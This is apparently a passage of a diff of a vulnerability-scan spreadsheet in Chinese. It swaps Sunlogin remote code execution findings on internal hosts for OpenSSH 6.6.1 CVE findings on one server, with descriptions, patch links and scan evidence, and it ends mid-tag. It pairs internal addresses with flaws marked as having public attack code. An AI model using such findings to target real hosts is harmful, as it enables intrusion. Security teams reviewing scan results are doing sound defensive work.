-          <t>192.168.66.176</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N10" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O10" t="inlineStr">
@@ -1868,7 +1561,7 @@
       </c>
       <c r="T10" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U10" t="inlineStr"/>
@@ -1879,29 +1572,7 @@
       </c>
       <c r="W10" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X10" t="inlineStr">
@@ -1918,7 +1589,7 @@
     <row r="11">
       <c r="A11" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>OpenSSH 安全漏洞(CVE-2021-28041)</t>
         </is>
       </c>
       <c r="B11" t="inlineStr">
@@ -1931,56 +1602,56 @@
           <t>高危</t>
         </is>
       </c>
-      <c r="D11" t="inlineStr">
-        <is>
-          <t>代码执行</t>
-        </is>
-      </c>
+      <c r="D11" t="inlineStr"/>
       <c r="E11" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
+https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db</t>
         </is>
       </c>
       <c r="F11" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH before 8.5 存在安全漏洞，攻击者可利用该漏洞在遗留操作系统上不受约束的代理套接字访问。</t>
         </is>
       </c>
       <c r="G11" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H11" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I11" t="inlineStr">
         <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J11" t="inlineStr"/>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J11" t="inlineStr">
+        <is>
+          <t>CVE-2021-28041</t>
+        </is>
+      </c>
       <c r="K11" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L11" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M11" t="inlineStr">
         <is>
-          <t>192.168.50.190</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N11" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O11" t="inlineStr">
@@ -2002,7 +1673,7 @@
       </c>
       <c r="T11" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U11" t="inlineStr"/>
@@ -2013,29 +1684,7 @@
       </c>
       <c r="W11" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X11" t="inlineStr">
@@ -2052,7 +1701,7 @@
     <row r="12">
       <c r="A12" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>OpenSSH 信息泄漏漏洞(CVE-2018-15919)</t>
         </is>
       </c>
       <c r="B12" t="inlineStr">
@@ -2062,59 +1711,62 @@
       </c>
       <c r="C12" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D12" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>信息泄露</t>
         </is>
       </c>
       <c r="E12" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.openssh.com/</t>
         </is>
       </c>
       <c r="F12" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>OpenSSH 7.8及之前版本中的auth-gss2.c文件存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。</t>
         </is>
       </c>
       <c r="G12" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H12" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I12" t="inlineStr">
         <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J12" t="inlineStr"/>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J12" t="inlineStr">
+        <is>
+          <t>CVE-2018-15919</t>
+        </is>
+      </c>
       <c r="K12" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L12" t="inlineStr">
         <is>
-          <t>2026-07-13 21:25</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M12" t="inlineStr">
         <is>
-          <t>192.168.50.76</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N12" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O12" t="inlineStr">
@@ -2136,7 +1788,7 @@
       </c>
       <c r="T12" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U12" t="inlineStr"/>
@@ -2147,29 +1799,7 @@
       </c>
       <c r="W12" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X12" t="inlineStr">
@@ -2186,7 +1816,7 @@
     <row r="13">
       <c r="A13" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>OpenSSH Maxauthtries限制绕过漏洞(CVE-2015-5600)</t>
         </is>
       </c>
       <c r="B13" t="inlineStr">
@@ -2201,54 +1831,57 @@
       </c>
       <c r="D13" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>越权访问</t>
         </is>
       </c>
       <c r="E13" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c</t>
         </is>
       </c>
       <c r="F13" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>OpenSSH 6.9及之前版本的sshd中的auth2-chall.c文件中的‘kbdint_next_device’函数存在安全漏洞，该漏洞源于程序没有正确限制处理单链接中的keyboard-interactive设备。远程攻击者可借助ssh -oKbdInteractiveDevices选项中较长且重复的列表利用该漏洞实施暴力破解攻击，或造成拒绝服务（CPU消耗）。</t>
         </is>
       </c>
       <c r="G13" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H13" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I13" t="inlineStr">
         <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J13" t="inlineStr"/>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J13" t="inlineStr">
+        <is>
+          <t>CVE-2015-5600</t>
+        </is>
+      </c>
       <c r="K13" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L13" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M13" t="inlineStr">
         <is>
-          <t>192.168.54.100</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N13" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O13" t="inlineStr">
@@ -2270,7 +1903,7 @@
       </c>
       <c r="T13" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U13" t="inlineStr"/>
@@ -2281,29 +1914,7 @@
       </c>
       <c r="W13" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X13" t="inlineStr">
@@ -2320,7 +1931,7 @@
     <row r="14">
       <c r="A14" t="inlineStr">
         <is>
-          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+          <t>OpenSSH sshd 拒绝服务漏洞(CVE-2016-10708)</t>
         </is>
       </c>
       <c r="B14" t="inlineStr">
@@ -2335,54 +1946,57 @@
       </c>
       <c r="D14" t="inlineStr">
         <is>
-          <t>代码执行</t>
+          <t>拒绝服务</t>
         </is>
       </c>
       <c r="E14" t="inlineStr">
         <is>
-          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
-https://sunlogin.oray.com/download/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.openssh.com/releasenotes.html</t>
         </is>
       </c>
       <c r="F14" t="inlineStr">
         <is>
-          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。sshd是其中的一个独立守护进程。OpenSSH 7.4之前版本中的sshd存在安全漏洞。远程攻击者可借助乱序的NEWKEYS消息利用该漏洞造成拒绝服务（空指针逆向引用和守护进程崩溃）。</t>
         </is>
       </c>
       <c r="G14" t="inlineStr">
         <is>
-          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H14" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I14" t="inlineStr">
         <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J14" t="inlineStr"/>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J14" t="inlineStr">
+        <is>
+          <t>CVE-2016-10708</t>
+        </is>
+      </c>
       <c r="K14" t="inlineStr">
         <is>
-          <t>2026-07-13 21:33</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L14" t="inlineStr">
         <is>
-          <t>2026-07-13 21:33</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M14" t="inlineStr">
         <is>
-          <t>192.168.50.143</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N14" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O14" t="inlineStr">
@@ -2404,7 +2018,7 @@
       </c>
       <c r="T14" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U14" t="inlineStr"/>
@@ -2415,29 +2029,7 @@
       </c>
       <c r="W14" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" 